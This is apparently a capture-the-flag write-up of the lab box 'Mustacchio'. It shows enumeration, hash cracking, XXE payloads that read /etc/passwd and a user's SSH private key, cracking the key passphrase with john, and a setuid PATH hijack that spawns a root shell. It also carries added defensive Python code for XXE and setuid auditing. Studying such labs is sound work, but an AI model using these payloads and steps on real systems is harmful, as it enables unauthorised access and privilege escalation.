1. Scanning & Enumeration
We do the below scans in parallel.
1.1. Port Scanning
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA)
| 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA)
|_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Info Gathered:
- SSH open on 22
- Port 80 with a website open
More information gathered later, as the full port scan takes a lot longer.
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8765/tcp open ultraseek-http
We could explore the last port later.
1.2. Web Enumeration
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 'php,html,txt' -t 32 -q -u 10.10.247.224
/images (Status: 301) [Size: 315] [--> http://10.10.247.224/images/]
/about.html (Status: 200) [Size: 3152]
/contact.html (Status: 200) [Size: 1450]
/index.html (Status: 200) [Size: 1752]
/blog.html (Status: 200) [Size: 3172]
/gallery.html (Status: 200) [Size: 1950]
/custom (Status: 301) [Size: 315] [--> http://10.10.247.224/custom/]
/robots.txt (Status: 200) [Size: 28]
/fonts (Status: 301) [Size: 314] [--> http://10.10.247.224/fonts/]
/server-status (Status: 403) [Size: 278]
Info gathered:
- custom looks interesting
- robots.txt usually contains interesting information
1.3. Web Exploration
The homepage.
We explore the /custom/ page, and from there find another /js/ directory.
I first looked in users.bak. We get something interesting!
┌──(kali㉿kali)-[/tmp]
└─$ cat users.bak
��r�CtableusersusersCREATE TABLE "users" (
"id" INTEGER,
"username" TEXT,
"password" TEXT,
"role" INTEGER
��2 ]admin{hash_was_here_and_i_hid_it_lol}
1.4. Hash Cracking
Looks like a hash for the username admin. But, of what kind?
┌──(kali㉿kali)-[/tmp]
└─$ hashid {hash_was_here_and_i_hid_this_too}
Analyzing '{yeee_hawww}'
[+] SHA-1
[+] Double SHA-1
[+] RIPEMD-160
[+] Haval-160
[+] Tiger-160
[+] HAS-160
[+] LinkedIn
[+] Skein-256(160)
[+] Skein-512(160)
Using John the Ripper, we get the password XD
┌──(kali㉿kali)-[/tmp]
└─$ ssh admin@10.10.247.224
The authenticity of host '10.10.247.224 (10.10.247.224)' can't be established.
ECDSA key fingerprint is SHA256:g//RSEsVCZF6FIydF0R24Gmek8fI6D7kRnDXF3fNK9Y.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.247.224' (ECDSA) to the list of known hosts.
admin@10.10.247.224: Permission denied (publickey).
And … we see that we are not allowed :( At this point, we have one last option left.
1.5. The Mystery Port & Our Key to Success
Exploring the last port, we get some more information.
PORT STATE SERVICE VERSION
8765/tcp open http nginx 1.10.3 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let’s go!
We see an admin panel! Recall, we already have the credentials :D
We see the following in the source code. <!-- Barry, you can now SSH in using your key!-->
Now what?
1.6. XML
I opened up Burp Suite, and I got the following.
POST /home.php HTTP/1.1
Host: 10.10.247.224:8765
...
Connection: close
xml=wow
We have a comment box that looks like a place to enter XML text, as we see in the POST request.
Let’s try:
<?xml version="1.0" encoding="UTF-8"?>
<root>
<author>hacc</author>
<name>Hackerman</name>
</root>
Ey, Voila!
I looked around, and I came across OWASP's XXE page.
Now, we can craft a special tasty XXE attack.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE author [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root><author>&read;</author></root>
Explanation:
- The first line is the prolog.
- The second line declares a DOCTYPE named author, defining an entity called read whose content is the system file /etc/passwd.
- When we ask to display the author, we put &read; between the tags. The parser expands the entity and prints the desired output.
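As an added example (not code from the writeup or the room), here is the server-side gate the comment box on port 8765 is missing: it refuses any document that declares a DOCTYPE or an entity before the author and name fields are read. The handler name parse_comment and the field mapping are assumptions; the two sample documents are the requests posted above.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET


class UnsafeXml(ValueError):
    """The document tried to declare a DOCTYPE or an entity."""


def reject_doctype(xml_text: str) -> None:
    """Pre-parse with bare expat and abort on any DTD construct.

    Expat fires these callbacks before it resolves anything, so the
    SYSTEM entity pointing at /etc/passwd is never opened.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE '{name}' is not allowed")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXml(f"entity '{name}' (SYSTEM={sysid}) is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_text, True)


def parse_comment(xml_text: str) -> dict:
    """What the assumed home.php handler should do with the 'xml' field."""
    reject_doctype(xml_text)
    root = ET.fromstring(xml_text)
    return {child.tag: (child.text or "") for child in root}


def is_accepted(xml_text: str) -> bool:
    """True if the gate lets the document through, False if it rejects it."""
    try:
        parse_comment(xml_text)
        return True
    except UnsafeXml:
        return False


# Constructed samples, copied from the two requests in the writeup.
BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<root>
<author>hacc</author>
<name>Hackerman</name>
</root>"""

XXE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE author [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root><author>&read;</author></root>"""
```

The first document yields the two fields; the second is rejected on the DOCTYPE line, so the file reference is never followed.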
1.7. SSH Keys
Using the above listing, we find two users, joe and barry. We see the hint given to us in the source code, to log in over SSH with barry as the username.
We can modify the request as such:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE author [<!ENTITY read SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<root>
<author>&read;</author>
</root>
And we can get the private key! Use chmod 600 id_rsa to assign appropriate permissions.
2. Foothold
Trying the key, we see that we need a passphrase. We can use ssh2john for this.
┌──(kali㉿kali)-[/tmp]
└─$ locate ssh2john
/usr/share/john/ssh2john.py
┌──(kali㉿kali)-[/tmp]
└─$ /usr/share/john/ssh2john.py id_rsa > hash
┌──(kali㉿kali)-[/tmp]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 6 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
{passphrase} (id_rsa)
1g 0:00:00:03 DONE (2021-06-12 10:53) 0.2754g/s 3950Kp/s 3950Kc/s 3950KC/s 1990..*7¡Vamos!
Session completed
Let’s login!
┌──(kali㉿kali)-[/tmp]
└─$ ssh -i id_rsa barry@10.10.237.166
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
13 packages can be updated.
10 of these updates are security updates.
To see these additional updates run: apt list --upgradable
Last login: Sat Jun 12 13:20:56 2021 from 10.17.8.184
barry@mustacchio:~$
3. PrivEsc
Okay now what? Sudo we can’t touch. Crontab empty. Linux kernel tip top. SUID?
barry@mustacchio:~$ find / -type f -perm -u=s 2> /dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/home/joe/live_log
/bin/ping
/bin/ping6
/bin/umount
/bin/mount
/bin/fusermount
/bin/su
Okay. So, /home/joe/live_log shows us the following.
barry@mustacchio:~$ file /home/joe/live_log
/home/joe/live_log: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6c03a68094c63347aeb02281a45518964ad12abe, for GNU/Linux 3.2.0, not stripped
Okay, let’s execute.
barry@mustacchio:~$ /home/joe/live_log
10.17.8.184 - - [12/Jun/2021:09:09:41 +0000] "POST /home.php HTTP/1.1" 200 1123 "http://mustacchio.thm:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
10.17.8.184 - - [12/Jun/2021:09:09:47 +0000] "POST /home.php HTTP/1.1" 200 1123 "http://mustacchio.thm:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
...
^CLive Nginx Log
It says it is Live Nginx Log. We clearly need more information. What about the strings in the executable?
...
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
...
crtstuff.c
...
demo.c
...
Look closely! We have tail present. This is now a simple PATH exploit. 2 simple steps:
- We add the current directory to the PATH environment variable.
- We create an executable called tail.
Step 1:
barry@mustacchio:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:~$ export PATH=$PWD:$PATH
barry@mustacchio:~$ echo $PATH
/home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Step 2:
barry@mustacchio:~$ cat tail
#!/usr/bin/python3
import pty
pty.spawn("/bin/bash")
barry@mustacchio:~$ chmod +x tail
barry@mustacchio:~$ /home/joe/live_log
root@mustacchio:~#
System Compromised!
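An added defensive check, not part of the writeup: the two observations that made this work (a setuid file outside the system directories, and a command string resolved through PATH) as a small audit over the find and strings output shown above. The trusted directory list and the command heuristic are assumptions of this example, and the inputs are trimmed copies of the output above.

```python
import re
import shlex

# Directories where distribution packages normally install setuid binaries
# (an assumption of this example, not something stated on the box).
TRUSTED_SUID_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/")

# A line that looks like a shell command: a word followed by a flag or a path.
COMMAND_RE = re.compile(r"^[A-Za-z0-9_./+-]+\s+(-|/)")


def odd_suid_binaries(listing: str) -> list:
    """Setuid files living outside the usual package directories."""
    return [p for p in listing.splitlines()
            if p and not p.startswith(TRUSTED_SUID_DIRS)]


def path_relative_commands(strings_output: str) -> list:
    """(program, full command) pairs whose program name has no directory part.

    A setuid program handing such a string to system()/popen() lets the
    caller's PATH decide which 'tail' runs, which is the flaw shown above.
    """
    hits = []
    for line in strings_output.splitlines():
        if not COMMAND_RE.match(line):
            continue
        argv = shlex.split(line)
        if argv and "/" not in argv[0]:
            hits.append((argv[0], line))
    return hits


# Constructed inputs, trimmed from the find and strings output in the writeup.
SUID_LISTING = """/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/sudo
/home/joe/live_log
/bin/mount
/bin/su"""

STRINGS_OUTPUT = """Live Nginx Log Reader
tail -f /var/log/nginx/access.log
crtstuff.c
demo.c"""

if __name__ == "__main__":
    print("suspicious setuid files:", odd_suid_binaries(SUID_LISTING))
    print("PATH-resolved commands:", path_relative_commands(STRINGS_OUTPUT))
```

On the binary side the fix is to call /usr/bin/tail by absolute path, or exec it with a fixed PATH, rather than let a setuid program inherit the caller's environment.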